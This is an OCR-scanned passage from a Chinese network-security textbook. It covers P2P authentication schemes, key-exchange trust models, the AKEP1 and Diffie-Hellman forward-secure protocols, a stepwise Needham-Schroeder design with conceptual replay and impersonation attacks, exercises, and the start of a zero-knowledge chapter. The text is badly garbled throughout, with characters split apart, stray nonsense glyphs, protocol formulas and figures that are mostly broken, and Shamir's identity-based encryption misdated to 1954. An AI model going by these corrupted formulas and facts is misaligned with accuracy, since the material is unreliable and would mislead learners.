(CA) ,来 确认 声称 拥有 公共 密 钥 的 人 的 真正 身份 。 在 P2P 网 络 中 使 用 第 三 方 充当 认证 中 
心 CA, 可 以 很 好 地 保障 系统 安全 。 然 而 ,PKI 过 于 复杂 ,存在 诸如 证 书 获 取 、 证 书 撤销 、 跨 
域 认证 等 困难 ,实现 代价 昂贵 ,不 适用 于 较 大 的 P2P 网 络 。 可 以 通过 分 层 或 分 区 域 的 方法 
进行 改进 : 如 使 用 ASCAuthentication Server) 和 超级 节点 的 网 络 结构 ,通过 PKC(Public 
Key Certificate) 和 Kerberos 认证 方法 进行 认证 。 

(2) 基于 分 布 式 CA 的 认证 方案 。 该 方案 充分 利用 P2P 网 络 的 分 布 性 和 对 等 性 ,将 大 
量 的 节点 作为 子 CA 节点 进行 公 钥 加密 计 算 ,利用 门限 技术 保证 CA 密 钥 的 安全 性 、 保 密 性 
和 系统 的 抗 攻击 性 。 分 布 式 CA 充分 利用 了 P2P 网 络 的 节点 资源 ,增强 了 和 鲁 棒 性 和 可 扩展 
性 ; 但 同时 也 带 来 了 新 的 安全 隐患 ,一 旦 共 谋 的 恶意 节点 数 大 于 一 定 门限 值 , 系 统 便 立 刻 陷 


验证 和 名 并 | 


入 信任 危机 。 

2. 非 基于 CA 的 认证 

(1) 利用 单 向 累积 函数 实现 分 布 式 网 络 的 认证 。 单 向 散 列 函 数 将 任意 长 度 的 消息 压缩 
到 某 一 固定 长 度 的 消息 摘要 。 利 用 单 向 累积 函数 节点 之 间 可 以 直接 实现 交互 认证 。 然 而 ， 
新 加 入 的 节点 成 为 中 心计 算 节点 的 策略 使 得 单个 恶意 节点 便 可 严重 危害 网 络 安全 。 

(2) 基于 零 知识 的 认证 。 基 本 思想 : 称 为 证 明 者 的 一 方 试图 使 被 称 为 验证 者 的 另 一 方 
相信 某 个 论断 是 正确 的 , 却 又 不 向 验证 者 提供 任何 有 用 的 信息 。 采 用 交互 式 协议 实现 如 下 : 

P>Q: 满足 一 定 条 件 的 承诺 随机 数 ; 

QP: 满足 一 定 条 件 的 询问 随机 数 ; 

PQ: 按 一 定 的 算法 计算 后 ,将 相关 信息 传送 给 Q; 

Q: 接受 PP 的 信息 后 按 一 定 的 算法 验证 P 的 身份 ,P 欺骗 Q 的 概率 是 2“(R 一 1,2,…)。 
协议 重复 执行 1 次 ,P 欺骗 Q 的 概率 为 2 “(R 一 1,2,…)。 

由 于 P2P 网 络 的 动态 性 ,分 散 性 ,无 中 心 管理 器 的 组 织 、 管 理 ,使 得 基于 对 称 和 非 对称 
加 密 的 认证 过 程 中 的 共享 认证 信息 存在 被 窃取 、 算 改 的 可 能 。 采 用 零 知 识 认证 的 方法 ,可 以 
有 效 地 实现 双方 的 认证 ,避免 任何 有 用 信息 的 外 泄 。 

(3) 基于 数字 签名 的 认证 。 通 过 将 用 户 的 身份 ID 或 者 其 他 可 以 表明 用 户 唯一 身份 的 
特征 通过 数字 签名 ,实现 用 户 的 身份 认证 。 假 设 协 同 工 作 的 合法 用 户 都 具有 能 表明 身份 的 
图 像 ,如 徽章 .印章 等 ,还 可 以 将 数字 签名 与 数字 水 印 技 术 相 结合 ,实现 用 户 身 份 的 认证 。 

(4) 基于 信任 网 (Web of Trust) 认 证 。 基 于 信任 网 的 认证 可 以 在 没有 服务 器 的 条 件 下 
认证 节点 。 通 过 节点 之 间 的 信任 关系 来 实现 分 布 式 认证 。 节 点 之 间 的 信任 是 通过 信任 关系 
的 传递 来 实现 的 ,每 个 节点 都 可 以 从 其 信任 节点 获得 一 个 有 效 的 公共 密 钥 ,来 实现 节点 之 间 
的 认证 。 但 是 ,由 于 在 获取 公共 密 钥 时 没有 生成 路 由 表 , 因 而 很 难 累 积 所 有 的 公共 密 钥 ,而 
且 节点 需要 大 量 的 存储 空间 去 管理 密 钥 , 和 大 量 通 信 数 据 交 换 密 铀 。HDAM(Hash-based 
Distributed Authentication Method) 认 证 方法 便 是 建立 在 信任 网 上 的 认证 。 

(5) 基于 分 布 式 哈 希 表 的 认证 。 可 以 通过 利用 信任 网 形成 节点 之 间 的 信任 关系 ,然后 通过 
分 布 式 哈 希 表 管 理 有 效 地 分 布 式 地 管理 公共 密 钥 ,从 而 可 以 有 效 地 解决 P2P 网 络 中 的 认证 问题 。 


7.2 密 钥 交换 协议 


密 钥 交换 协议 用 于 在 参与 协议 的 两 个 或 者 多 个 实体 之 间 建 立 共 享 的 秘密 信息 ,通常 用 
于 建立 在 一 次 通信 中 所 使 用 的 会 话 密 钥 。 密 钥 交 换 协议 也 称 为 密 钥 建 立 协议 、 密 钥 分 配 协 
议 或 者 密 钥 协商 协议 。 密 钥 交 换 协议 中 秘密 信息 的 建立 有 3 种 方式 : 第 一 种 方式 是 由 一 个 
可 信 实 体 生成 秘密 信息 并 传递 给 其 他 参与 实体 ; 第 二 种 方式 是 由 任 一 实体 生成 秘密 信息 并 
传递 给 其 他 参与 实体 ; 第 三 种 方式 是 由 参与 实体 根据 协议 消息 共同 计算 出 秘密 信息 。 由 于 
密 钥 交 换 协议 缺乏 认证 ,容易 受到 攻击 (如 中 间 人 攻击 ) ,因此 需要 与 认证 协议 共同 构成 认证 
及 密 钥 交换 协议 。 


7.2.1 可 信 模 型 


1. 三 方 模型 
在 这 个 模型 中 ,有 一 个 可 信 方 称 为 认证 服务 器 S。 在 这 个 系统 下 ,假设 A 有 一 个 密 钥 


司 赤 安全 碎 议 
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KA ,与 服务 器 共享 ,这 是 两 方 的 私 钥 ,其 他 任何 人 都 不 知道 。 当 两 方 A、B 分 别 共享 Ks。、Ks 
时 ,S 使 用 密 钥 KA ,Ka 分 发 给 两 方 会 话 密 钥 玉 。 分 布 式 密 钥 假设 作为 一 个 安全 会 话 密 钥 ， 
当 多 方 完成 通信 过 程 时 ,将 丢弃 密 钥 KK, 如 果 随 后 希望 有 其 他 的 通信 过 程 ,三 方 协议 是 重新 
执行 和 得 到 一 个 新 的 、 新 鲜 的 会 话 密 钥 。 

2. 两 方 非 对 称 模型 

当 使 用 公 钥 密码 体制 时 ,认证 服务 器 活动 的 角色 能 够 被 消除 。 在 这 种 可 信 模 型 下 ,假设 
是 A 有 B 的 公 钥 pks,B 有 人 A 的 公 钥 pk, 也 就 是 说 A 假设 是 了 B 的 公 钥 真 正 持 有 者 ,不 是 另 
外 一 些 人 的 ,并 且 B 的 情况 类 似 。 现 在 假设 A 和 了 B 希望 从 事 安全 通信 会 话 , 希 望 考虑 的 问 
题 是 怎样 通过 双方 协议 ,能 够 得 到 一 个 共享 私 钥 和 认证 过 程 会 话 密 钥 。 

3. 两 方 对 称 模型 

最 简单 的 模型 是 两 方 已 分 享 一 个 长 效 密 钥 ,每 次 在 通信 会 话 中 ,运行 一 个 协议 而 得 到 一 
个 临时 会 话 密 钥 。 这 种 方法 的 目的 是 对 全 局 变量 的 折 中 ,为 了 不 影响 全 局 安全 ,每 个 会 话 密 
钥 要 隔离 分 配 。 


7.2.2 安全 性 讨论 


会 话 密 钥 分 发 中 ,新 颖 的 主要 元 素 多 种 会 话 渠 道 同 时 保存 。 一 方 必须 有 多 种 实例 ,这 些 
例子 是 逻辑 终点 的 重要 例子 ,不 包括 自己 。 网 络 中 的 主动 攻击 在 所 有 参与 者 中 进行 通信 控 
制 : 控制 方 可 以 对 没有 要 求 的 接收 者 进行 密 钥 的 随意 分 发 ,通过 自己 的 选择 进行 充分 的 混 
合 ,并 且 对 所 有 的 参与 者 开始 新 的 例证 。 进 一 步 ,可 以 增加 将 要 讨论 的 各 种 攻击 。 

对 会 话 密 钥 一 个 重要 的 要 求 是 一 个 过 程 的 会 话 密 钥 必须 是 与 其 他 的 会 话 密 钥 独立 ,这 
是 因为 不 能 确定 会 话 密 钥 究竟 是 在 哪个 实例 中 进行 使 用 。 也 许可 以 停止 进行 公开 某 一 密 
钥 , 但 是 可 以 不 对 其 他 密 钥 有 影响 。 这 是 在 最 坏 条 件 下 进行 的 构造 ,允许 攻击 者 随意 公开 密 
钥 。 甚 至 在 其 他 会 话 密 钥 公 开 的 条 件 下 ,在 没有 公开 的 同伴 中 进行 密 钥 共 享 可 以 保持 秘密 。 
一 个 最 重要 的 条 件 是 密 钥 的 共享 意味 着 安全 。 用 传统 的 观念 是 如 果 攻 击 者 无 法 计算 则 密 铀 
是 安全 的 。 但 是 对 于 不 断 进步 的 装置 条 件 ,这 里 没有 确定 的 安全 概念 ,必须 阻止 部 分 信息 
泄露 。 

7.3 ”认证 及 密 钥 交换 协议 

这 类 协议 将 密 钥 交换 协议 和 认证 协议 的 功能 结合 在 一 起 ,是 网 络 通信 中 最 常用 的 安全 
协议 ,通常 将 其 归属 于 认证 协议 。 
7.3.1 认证 及 密 钥 交换 协议 基本 分 类 

1. 基于 口令 的 认证 及 密 钥 交换 协议 

在 基于 口令 的 安全 协议 中 ,用 户 间 通 常事 先 共享 一 个 口令 ,用 来 在 通信 中 进行 彼此 的 身 
份 认证 并 (或 ) 协 商 一 个 会 话 密 钥 ,该 口令 实质 上 是 一 个 较 短 的 易 记 忆 的 长 期 对 称 密 钥 。 基 


于 口令 的 方案 可 以 避免 复杂 的 密 钥 管理 ,无 需 额外 的 公 钥 设施 或 者 安全 硬件 。 目 前 已 经 提 
出 了 许多 基于 口令 实现 的 方案 。 


2. 基于 身份 的 认证 及 密 钥 交 换 协议 

1954 年 ,Shamir 创造 性 地 提出 了 基于 身份 加 密 (Identity-Based Encryption,IBE) 体 制 
的 概念 。 与 传统 的 公 钥 加 密 体制 公 钥 基础 设施 (Public Key Infrastructure,PKD) 不 同 ， 
IBE 体制 可 以 采用 任意 的 , 且 能 够 唯一 标识 用 户 的 身份 信息 作为 用 户 的 公 钥 进行 加 密 。 例 
如 : 用 户 的 身份 证 信息 等 。 由 于 IBE 体制 中 密 文 的 发 送 方 知道 接收 方 的 身份 信息 ,因此 发 
送 方 可 以 取消 询问 在 线 证 书 授权 中 心 (Certificate Authority,CA) 有 关 接 收 方 公 钥 信息 ,而 
直接 采用 接收 方 的 身份 信息 加 密 明 文 , 即 取消 了 对 CA 的 需求 ,从 而 在 很 大 程度 上 提高 了 系 
统 效率 ,特别 是 解决 了 CA 的 性 能 瓶颈 问题 。 


7.3.2 典型 认证 及 密 钥 交换 协议 


广义 上 认为 , 密 钥 交换 包括 密 钥 协 商 和 密 钥 分 发 ,其 两 者 的 主要 区 别 是 : 密 钥 分 发 是 一 
个 发 方 ( 指 分 发 密 钥 的 一 方 ) 主动 而 收 方 ( 指 接收 密 钥 的 一 方 ) 被 动 的 关系 ,就 是 说 最 终生 成 
的 密 钥 受制 于 发 方 , 收 方 还 没有 参与 到 信息 密 钥 的 制定 过 程 中 ; 而 密 钥 协商 则 是 密 钥 的 制 
定 受 制 于 双方 或 多 方 。 

1. 对 称 密 钥 体 制 

假设 K 是 多 方 共享 的 (长 效 ) 密 钥 , 固 定 私 钥 加 密 体制 (E,D) 和 一 个 私 钥 认 证 体制 (T， 
V)。 密 钥 K 分 成 两 部 分 : K, 和 K ,前 者 是 加 密 密 钥 , 后 者 是 消息 认证 密 钥 ,如 图 7.3 所 
示 , 流 程 描述 如 下 : 

(1) A 选择 一 个 随机 数 Ra 并 且 发 送 给 B。 

(2) B 随机 选择 一 个 数 Rs ,应 该 随机 选择 一 个 1 比特 的 会 话 密 钥 a。 在 天 。 密 钥 作用 下 
产生 密 文 C=Ek (ae)。 计 算 wp 一 Tk,(CB1AIRA Rs |C) ,然后 将 Ra、Cvp 发 送 给 A。 

(3) 如 果 验 证 Vk, (BAI Ra Rs 上 Csp) 二 1, 则 接受 。 并 计算 Tk, (A Rs) 发 送 


给 B。 
(4) B 验证 最 后 的 标签 , 若 最 后 的 标签 是 有 效 的 , 则 接受 (输出 会 话 密 钥 a)。 


A Ra B 


> 


Rs | ex (a) | Tin (CB A Ra | Rs | ex (a)) 


< 


Txn (A Rs) 


— 


图 7.3 协议 AKEP1: 对 称 密码 设置 中 的 会 话 密 钥 分 发 


2. 非 对 称 密码 体制 

选择 一 个 公 钥 加 密 体制 ,假设 分 别 定义 了 下、D 为 加 密 和 解密 体制 ,前 者 采用 公共 加 密 
密 钥 pk 并 且 消 息 返回 一 个 密 文 , 随 后 采用 了 秘密 解密 密 钥 sk* ,并 且 密 文 返回 明文 ,假设 这 
个 体制 在 某 种 情况 下 是 安全 的 。 再 选择 一 个 数字 签名 体制 ,分 别 定 义 S、V 作为 签名 和 验证 
算法 ,前 者 采用 了 一 个 秘密 签名 密 钥 sg? 并 且 返 回 签名 的 消息 ,随后 使 用 公 钥 验证 密 钥 pk 
来 验证 消息 ,候选 签名 返回 一 个 值 来 判定 签名 是 有 效 的 ,假设 这 个 体制 在 某 种 情况 下 是 安 
全 的 。 


基本 安全 认 议 


塌 沁 溃 


秦 于 案例 的 网 络 安全 技术 与 实践 


在 系统 中 ,每 个 用 户 I 有 一 个 公 钥 pki. 事 实 上 是 一 对 公 钥 ,pki 王 (pki,pk?) ,一 个 是 加 
密 体制 , 另 一 个 是 签名 体制 。 对 所 有 攻击 者 和 用 户 , 这 些 密 钥 是 已 知 的 。 然 而 ,用 户 保持 私 
密 和 通信 秘密 密 钥 ,也 就 是 说 ,ski 王 (ski, sk?) 是 秘密 的 。 不 失 一 般 性 ,考虑 用 户 A 拥有 也 
的 公共 密 钥 pks ,并 且 B 拥 有 A 的 公 钥 kaA, 且 多 方 协议 最 终 目标 是 得 到 共享 密 钥 a, 典型 
协议 如 图 7.4 所 示 。 


A Ra B 


a 


Rs | ejx a (a) || S& a(B | Ra 1 Rs | epxra (a)) 


Sra (A Re) 


7.4 在 非 对 称 体制 中 的 对 称 密 钥 分 发 协议 


具体 描述 如 下 : 

(1) A 随机 选择 一 个 串 Ra 并 且 发 送 到 B。 

(2) B 随机 选择 一 个 串 Rs ,同时 随机 选择 1 比特 串 会 话 密 钥 a, 用 A 的 公 钥 pk% 加 密 产 
生 密 文 C==efpxa (a) ,现在 计算 签名 wp 一 Sa(B 1 Ra | Rs | epxa (Q)), 然 后 将 Re 、C、w 发 送 给 A。 

(3) A 验证 VB (A Ra Rs eC)==1 是 否 成 立 , 若 成 立 , 则 计算 签名 Sa (A ‖ Rs) 并 
发 送 给 B, 同 时 通过 a 二 Dsxa (C0) 解密 C 得 到 会 话 密 钥 。 

(4) B 验证 最 后 的 签名 Vk (A Rs) 二 1 是 否 成 立 , 如 果 签 名 是 有 效 的 , 则 接受 。 

3. 三 方 会 话 密 钥 

选择 一 个 私 钥 加 密 体 制 (E,D) ,假设 在 某 种 情况 下 是 安全 的 。 同 时 选择 消息 认证 体制 
(T,V) ,假设 在 某 种 情况 下 是 安全 的 。 密 钥 Ki 在 服务 器 S 和 1I 方 共享 是 一 对 密 钥 (Ki， 
K?)。 现 在 考虑 A、B 方 的 密 钥 是 Ka、Ks, 则 典型 的 三 方 会 话 密 钥 协议 一 个 简洁 的 表述 如 
图 7.5 所 示 。 


Flowl. A~~B:RA 

Flow2. B-~S:RA | Rs 

Flow3A. S—>A:eka (a) || TRa(CA1 BI Ra | eka (0)) 
Flow3B. S—B:eks (a) || Trs (A BI Rs | eks (0)) 


图 7.5 三 方 会 话 密 钥 分 发 协议 


具体 流程 如 下 : 

(1) Flowl,A 方 选择 挑战 随机 数 Ra 并 且 发 送 到 B。 

(2) Flow2,B 方 选择 挑战 随机 数 Rs 并 且 发 送 Ra | Rs 给 S。 

(3) Flow3,S 随机 选择 将 要 分 发 的 1 比特 会 话 密 钥 a. 在 每 方 共享 密 钥 的 前 提 下 ,S 加 
密会 话 密 钥 。 

Q@ Flow3A,A 方 收 到 消息 eka (a) | T& (CA BRa | eka (a)), 先 用 消息 认证 体制 中 
的 验证 算法 对 消息 进行 验证 : 如 果 VRa (A eB Ra | eka (a)) 二 1 成立 , 则 通过 验证 ,再 用 私 
钥 体 制 解密 D&a (ega (a)) 从 而 得 到 会 话 密 钥 a。 

@ Flow3B,B 方 收 到 消息 eks (a) 上 TRs (A BRs | eks (a)), 先 用 消息 认证 体制 中 的 


验证 算法 对 消息 进行 验证 : 如 果 Vs (A 上 BRs | eks (a)) 二 1 成立 , 则 通过 验证 ,再 用 私 钥 
体制 解密 Dks (eks (a)) 从 而 得 到 会 话 密 钥 a。 

4. 前 向 保密 

前 向 保密 是 一 个 特殊 的 安全 特征 ,对 于 一 个 会 话 密 钥 是 非常 重要 的 属性 。 也 就 是 说 , 即 
使 攻击 者 获得 某 个 协议 中 的 某 些 长 期 密 钥 ,他 也 不 能 据 此 得 到 以 前 协议 参与 成 员 直 接 协商 
的 会 话 密 钥 。 下 面 给 出 一 种 典型 的 基于 Diffie-Hellman 密 钥 交换 协议 的 前 向 安全 的 对 称 密 
钥 交 换 协议 (类 似 的 ,也 可 以 采用 非 对 称 密 钥 交换 体制 ), 如 图 7.6 所 示 。 


A 了 B 


及 |‖ Sas(B1A1e la) 


Sa (Alg’) 


7.6 前 向 安全 的 对 称 密 钥 交换 协议 


具体 流程 如 下 : 

(1) A 随机 选择 串 zx, 计算 XX = g* 并 发 送 给 B。 

(2) B 方 随机 选择 串 y, 假 设 Y = g*。 现 在 计算 签名 1 二 Ssxs (BA1g* | g?), 并 将 
kvY 发 送 给 A。 

(3) A 验证 V 妈 (BA gg*)=1 是 否 成 立 ,车 成 立 , 则 计算 签名 S&xa (A i g?) 并 发 
送 给 B, 同 时 本 地 计算 DH 密 钥 一 g* 作 为 会 话 密 钥 。 

(4) 同 理 ,B 收 到 消息 后 ,验证 签名 Vk (A | g”) 一 1 是 否 成 立 , 如 果 签 名 有 效 , 则 接受 。 
同时 本 地 计算 DH 密 钥 X* = 5g? 作为 会 话 密 钥 。 

注 : 如 果 有 一 个 好 的 单 向 Hash 函数 , 则 最 后 的 会 话 密 钥 采用 Hash(g? ) 更 为 安全 。 


7.3.3 设计 一 个 密 角 交换 协议 


背景 : A(Alice) 和 B(Bob) 和 希望 建立 一 个 新 鲜 的 会 话 密 钥 (Session Key) 用 来 加 密 他 们 
随后 的 通信 。 采 用 可 信 第 三 方 TTP(Third Trusted Party) 的 方式 来 传递 信任 关系 。 

协议 主体 : A,B,SCThird Trusted Server) 。 

前 提 : A 与 B 之 间 没 有 信任 关系 ; A 信任 S; B 信 任 S; S 的 任务 是 产生 随机 的 会 话 密 
钥 Ka 并 传输 给 A 和 B。 会 话 密 钥 (Session Key) 与 长 期 密 钥 (Kas ,Kas ) 。 

协议 目标 : 在 协议 结束 时 ,Kas 应 该 为 A 和 B 所 知 ,但 是 除了 S 之 外 的 其 他 主体 应 该 无 
法 知道 Kas ; A 和 B 应 该 知道 Kas 是 最 新 产生 的 。 

第 一 次 尝试 协议 ,如 图 7.7 所 示 ,流程 分 为 3 步 : 

(DD A-*S ; A, B 

(2) S>A : Kas。 

(3) A—>B : Ks, A。 

安全 假设 1: 敌手 能 够 窃听 密码 协议 中 传送 的 所 有 消息 。 根 据 安全 假设 1, 可 以 轻易 发 
现 敌 手 可 以 轻松 窃听 到 会 话 密 钥 Kas 。 


基本 安 会 认 议 
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基于 案例 的 网 络 安 会 其 术 与 实践 


第 二 次 尝试 协议 ,如 图 7. 8 所 示 , 其 中 Kas 表 示 A 与 S 的 共享 秘密 ,Kss 表 示 B 与 S 的 


共享 秘密 。 
(DA,B (DA.B 
(2) Kap (2) {Kap}kas, {Kap}kBs 
@) (3) Kap, A @) (3) {Kap}kBs, A 
7.7 第 一 次 尝试 协议 7.8 第 二 次 尝试 协议 


安全 假设 2: 敌手 能 够 使 用 任何 可 用 的 信息 修改 一 个 密码 协议 中 所 传送 的 所 有 消息 。 
敌手 能 够 把 任何 消息 重 发 给 任何 其 他 的 主体 ,这 包括 产生 和 插入 全 新 消息 的 能 力 。 根 据 安 
全 假设 2 敌手 C 可 以 发 动 如 图 7. 9 所 示 的 攻击 : 直接 修改 第 3 步 中 的 消息 ,将 身份 A 修改 
为 D, 得 以 欺骗 B。 
(9) 


(2) {Kaa}kas, {Kap}kBs 


@ G) {Kap}res A © GB) {Kas}kes DD 


7.9 对 第 二 次 尝试 协议 的 一 种 攻击 


(DA,B 


安全 假设 3: 敌手 可 以 是 合法 的 协议 参与 者 (an insider), 或 者 一 个 外 来 者 (an 
outsider) ,或 者 是 两 者 的 组 合 。 根 据 安全 假设 3 敌手 C 可 以 发 动 如 图 7. 10 所 示 的 攻击 : C 
假冒 B 的 同时 在 A 与 S 之 间 截 获 并 改造 消息 1 和 2, 最 终 达到 如 下 结果 : 成 功 欺骗 S 且 S 
以 为 A 要 与 C 进行 回话 ,同时 成 功 欺骗 A 使 之 以 为 正在 安全 地 与 B 进行 回话 ,C 并 将 回话 
密 钥 Kxc 拿 到 手 ,解密 所 有 A 想 要 与 B 进行 通信 的 消息 。 

第 三 次 尝试 协议 ,如 图 7. 11 所 示 。 


©) 


(1)A,C 
(2) {Kac}kas, {Kac}kcs (3) 
(DA.B (© (DA,B 
MA thas MR ices (2) {Ksp, BY}kAs, {Kap, A}kBs 


(0) 一 RN 一品 @ (3) {Kp, A}kes 


图 7.10 对 第 二 次 尝试 协议 的 第 二 种 攻击 图 7.11 第 三 次 尝试 协议 


安全 假设 4: 敌手 可 以 重 放 以 前 协议 运行 中 的 消息 。 根 据 安全 假设 4, 我 们 尝试 进行 攻 
击 , 如 图 7.12 所 示 : 敌手 C 假冒 S, 并 重 放 以 前 的 旧 消 息 ,使 得 A 和 B 采 用 以 前 的 旧 回 话 密 


钥 进 行 通 信 , 这 就 违背 会 话 密 钥 只 能 使 用 一 次 的 初衷 ,使 得 敌手 C 有 机 会 利用 多 个 旧 消 息 
来 恢复 旧 回话 密 钥 ,存在 安全 隐患 。 

第 四 次 尝试 协议 (Needham-Schroeder) ,如 图 7. 13 所 示 : 增加 一 个 临时 值 (Nonce): 一 
个 主体 临时 产生 的 随机 数 ; 采用 挑战 -应 答 (challenge-response) 方 式 。 


© 人 


(1)A,B, NA 
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7.12 第 三 次 尝试 协议 的 安全 隐患 图 7.13 NSSK 协议 


对 于 NSSK 协议 ,其 中 一 个 安全 隐患 是 消息 (1) 和 (2) 并 没有 与 消息 (3)、(4)、(5) 进 行 
新 鲜 性 关联 ,敌手 C 可 以 发 动 一 次 重 放 攻击 ,如 图 7. 14 所 示 : 敌手 C 重 放 消息 (3), 此 时 C 
有 可 能 经 过 长 期 努力 ,存在 攻破 消息 (3) 并 获得 旧 回 话 密 钥 的 可 能 ,使 得 消息 (4) 和 (5) 可 以 
进行 下 去 。 

第 五 次 尝试 协议 (Final 版 本 ) ,如 图 7. 15 所 示 。 


G) 


2) A, B, NA, NM 
必 A {Kg, B, NA}Ykas, {Kp, A, NBjkBs 
(3) {Kap’, A}kBs 


(4) {Ne}kaB: (DB, Ne 
© Ge G@) (人 OKwws (Be) 
图 7.14 NSSK 协议 的 一 种 可 能 攻击 方法 图 7.15 协议 最 终 版 本 
总 结 ， 


(1) 将 密码 协议 本 身 与 密码 协议 所 具体 采用 的 密码 算法 分 开 , 在 假定 密码 算法 “完善 ” 
的 基础 上 讨论 密码 协议 本 身 的 正确 性 、 安 全 性 、 元 余 性 等 课题 。 

(2) 建立 攻击 者 模型 。 攻 击 者 可 以 控制 整个 通信 和 网络 ,并 具有 如 下 能 力 : 窃听 所 有 经 
过 网 络 的 消息 ; 阻止 和 截获 所 有 经 过 网 络 的 消息 ; 存储 所 获得 的 或 自己 创造 的 消息 ; 可 以 
根据 存储 的 消息 伪造 消息 并 发 送 消 息 ; 可 以 作为 合法 的 主体 参与 协议 的 运行 。 


7.4 小 结 


本 章 给 出 认证 协议 、 密 钥 交 换 协 议 以 及 认证 密 钥 交换 协议 的 意义 、 模 型 .案例 以 及 安全 
性 讨论 ,最 后 给 出 一 个 密 钥 交换 协议 的 设计 过 程 。 
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7.5 习 题 


1. S 拥 有 所 有 用 户 的 公开 密 钥 ,用 户 A 使 用 协议 
A—>S:AI|BIR, 
S—A:SI|S(SI|AIR, Ko 
其 中 S,( ) 表 示 S 利用 私有 密 钥 签名 。 
向 S 申 请 B 的 公开 密 钥 Ke 。 上 述 协议 存在 问题 吗 ? 若 存在 ,请 说 明 此 问题 ; 若 不 存 
在 ,请 给 出 理由 。 
2. 请 你 利用 认证 技术 设计 两 套 系统 ,一 套用 于 实现 商品 的 真 伪 查 询 , 另 一 套用 于 防止 
电脑 彩票 伪造 问题 。 
3. 解释 身份 认证 的 基本 概念 。 
4. 单机 状态 下 验证 用 户 身份 的 3 种 因素 是 什么 ? 
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用 兵 之 法 ,无 怕 其 不 来 ,情理 有 以 竺 也, 无情 其 不 政 , 蛙 吾 有 所 不 可 攻 也 。 
一 孙子 


8.1 零 知识 协议 : 完美 的 证 明 


两 方 安全 协议 是 构造 多 方 安全 协议 的 基本 构件 ,通常 可 作为 黑 盒 直接 使 用 ,在 某 些 情况 
下 ,也 可 以 扩展 到 三 方 . 乃 至 N 方 。 

在 实际 生活 中 ,A 要 向 B 证 明 他 知道 某 秘密 的 常用 方法 是 把 他 知道 的 秘密 告诉 B, 但 这 
样 一 来 B 就 也 知道 了 这 个 秘密 。 如 何在 不 告诉 B 的 情况 下 ,使 B 相信 A 知道 这 个 秘密 ,就 
是 零 知识 证 明 要 解决 的 问题 。 有 了 零 知识 证 明 ,A 就 可 以 公布 不 包含 有 关 秘 密 的 信息 , 却 
能 使 任何 人 相信 他 知道 这 个 秘密 。 这 种 方法 可 以 使 研究 人 员 向 世人 证 明 他 知道 一 个 特殊 定 
理 的 证 明 方法 但 又 不 泄漏 证 明 。 零 知识 证 明 在 商业 、 军 事 等 方面 都 有 较 大 的 用 途 , 关 于 他 的 
研究 受到 各 国 研究 人 员 的 重视 ,在 国际 上 一 直 很 活跃 。 

具体 地 说 , 零 知 识 证 明 是 这 样 一 种 技术 ,证 明 方 P 掌握 某 些 秘密 信息 ,P 想 设法 让 验证 
方 V 相信 他 确实 掌握 那些 信息 ,但 又 不 想 让 V 也 知道 那些 信息 。 

证 明 方 P 掌 握 的 秘密 信息 可 以 是 某 些 长 期 没有 解决 的 猜想 问题 的 证 明 , 如 费 马 大 定 
理 、 图 的 三 色 问 题 等 ,也 可 以 是 缺乏 有 效 算法 的 难题 解法 ,如 大 数 因 式 分 解 、 离 散 对 数 问题 
等 。 信 息 的 本 质 是 可 以 验证 的 , 即 可 通过 具体 的 步骤 来 检测 它 的 正确 性 。 


8.1.1 零 知 识 思想 


零 知 识 的 基本 思想 是 : 称 为 证 明 者 的 一 方 试图 使 被 称 为 验证 者 的 另 一 方 相信 某 个 论断 
是 正确 的 , 却 又 不 向 验证 者 提供 任何 有 用 的 信息 。Quisquater、Gulllou 等 人 曾 用 一 个 关于 
洞穴 的 故事 来 解释 零 知 识 。 洞 穴 如 图 8. 1 所 示 .C 和 D 之 间 有 一 个 秘密 之 门 , 只 有 知道 咒语 
的 人 才能 打开 这 个 门 。 对 其 他 人 来 说 ,两 条 路 都 是 死胡同 。P 知道 这 个 洞穴 的 秘密 ,他 想 对 
V 证明 这 一 点 ,但 他 又 不 想 泄露 咒语 。 下 面 是 P 怎样 使 V 相信 他 知道 咒语 的 过 程 : 

(1) V 站 在 A 点 。 

(2) P 走 进 洞 穴 , 到 达 C 点 或 DD 点 。 

(3) 在 P 消失 在 洞穴 中 之 后 ,V 走 到 B 点 。 

(4) V 随机 地 命令 P 从 左 通道 或 从 右 通道 返回 也 位 置 。 

(5) P 按 照 V 的 命令 从 左 通道 或 右 通道 返回 B 位 置 ,在 必要 时 P 使 用 咒语 打开 C 与 D 
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位 置 之 间 的 门 。 

(6) P 和 V 重复 步骤 (1) 一 (5)n 次 。 

P 向 V 证 明 是 通过 交互 作用 协议 来 实现 的 ,V 
向 P 提出 要 求 , 若 P 知道 秘密 则 可 正确 应 付 V 的 要 
求 ; 若 P 不 知道 咒语 , 则 PP 欺骗 V 的 概率 为 1/2。V 
提 足 够 多 的 要 求 就 可 推断 P 是 否 知道 秘密 。 由 “P 和 
V 重复 步骤 (1) 一 (5)n 次 ”, 可 知道 P 成 功 欺 骗 V 的 
概率 为 1/2" 。 显 然 , 在 这 个 游戏 规则 中 ,V 除了 确信 了 
知道 秘密 咒语 外 ,V 没有 获得 任何 有 关 秘 密 咒 语 的 信 
息 。 这 是 一 个 非常 典型 的 零 知 识 证 明 协 议 的 例子 。 

案例 1: 假设 A 告诉 B: 我 知道 哥 德 巴赫 猜想 
的 证 明 ? 如 果 A 把 证 明 过 程 写 下 来 给 B 看 ,B 记 住 
了 证 明 然 后 以 自己 的 名 义 发 表 , A 将 蒙受 损失 ; 如 
果 A 不 把 证 明 给 B 看, B 如 何 证 实 A 确实 知道 ? 

案例 2: A 告诉 B: 我 知道 近期 有 支 股票 要 涨 ,我 们 两 个 合作 ,你 出 资 ,我 提供 信息 ? 合作 协 
议 达 成 之 前 ,A 显然 不 能 透露 股票 的 任何 信息 ; 但 是 如 果 B 不 能 确信 他 是 正确 的 ,肯定 不 会 投资 。 

其 思想 本 质 的 通俗 理解 : 证 明 者 “不 泄露 ”秘密 ,他 只 是 向 验证 者 证 明 他 知道 这 个 秘密 。 

零 知 识 协 议 与 认证 中 的 挑战 -应 答 协 议 的 区 别 : 

(1) 零 知 识 协议 “不 泄露 "秘密 ,挑战 -应 答 协 议 “ 不 发 送 " 秘 密 ,“ 不 发 送 " 秘 密 是 指 :“ 秘 
密 ” 用 某 种 方式 掩盖 后 发 送 (如 加 密 函 数 )。 

(2) 零 知 识 协议 中 的 验证 者 * 真 ”不 知道 证 明 者 的 “秘密 ”; 而 挑战 -应 答 协 议 中 的 验证 者 
“不 一 定 ” 不 知道 证 明 者 的 “秘密 ”: 如 基于 对 称 密 钥 的 挑战 -应 答 中 证 明 者 就 是 “知道 ?这 个 
